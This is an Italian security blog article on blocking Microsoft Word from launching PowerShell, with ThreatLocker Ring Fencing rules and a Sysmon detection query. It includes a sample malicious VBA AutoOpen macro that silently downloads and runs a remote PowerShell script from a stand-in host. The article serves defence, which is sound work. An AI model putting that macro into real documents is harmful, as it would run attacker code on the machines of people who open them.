Sicurezza

Come mitigare l’esecuzione non autorizzata di PowerShell via Microsoft Word

Dario Fadda Maggio 3, 2025

Questo articolo affronta un problema di sicurezza in cui Microsoft Word può eseguire comandi di PowerShell, indicando un possibile attacco informatico. Viene inoltre presentato il sistema di protezione Threat Locker Ring Fencing come soluzione per impedire interazioni non autorizzate tra le applicazioni. Implementando queste misure, le organizzazioni possono migliorare il proprio livello di sicurezza, garantendo che le applicazioni operino entro i limiti previsti.

Scenario critico: documenti Word che avviano PowerShell possono indicare un attacco in corso, spesso sfruttando macro o tecniche fileless.

Esempio di payload malevolo in VBA:

textSub AutoOpen()
    Shell "powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://malicio.us/script.ps1')", 0
End Sub

Soluzione con Threat Locker Ring Fencing:

  • Isolamento applicativo:
# Policy di esempio per bloccare l'interazione Word-PowerShell
New-ThreatLockerPolicy -Application "WINWORD.EXE" -DenyChildProcess "POWERSHELL.EXE" -Ringfencing
  • Monitoraggio proattivo:
# Rileva chiamate PowerShell da Office con Sysmon
Get-WinEvent -FilterHashtable @{LogName="Microsoft-Windows-Sysmon/Operational"; ID=1} | 
Where-Object { $_.Message -match "WINWORD.EXE.*POWERSHELL.EXE" }

Configurazione avanzata:

  • Whitelist di directory per le operazioni I/O
  • Blocco esecuzione script in-memory via AMSI
  • Limitazione COM/OLE tra applicazioni

L’approccio Zero Trust di Threat Locker riduce la superficie d’attacco senza richiedere firme tradizionali.

💬 Unisciti alla discussione!


Se vuoi commentare su Come mitigare l’esecuzione non autorizzata di PowerShell via Microsoft Word, utilizza la discussione sul Forum.
Condividi la tua esperienza, confrontati con altri professionisti e approfondisci i dettagli tecnici nel nostro 👉 forum community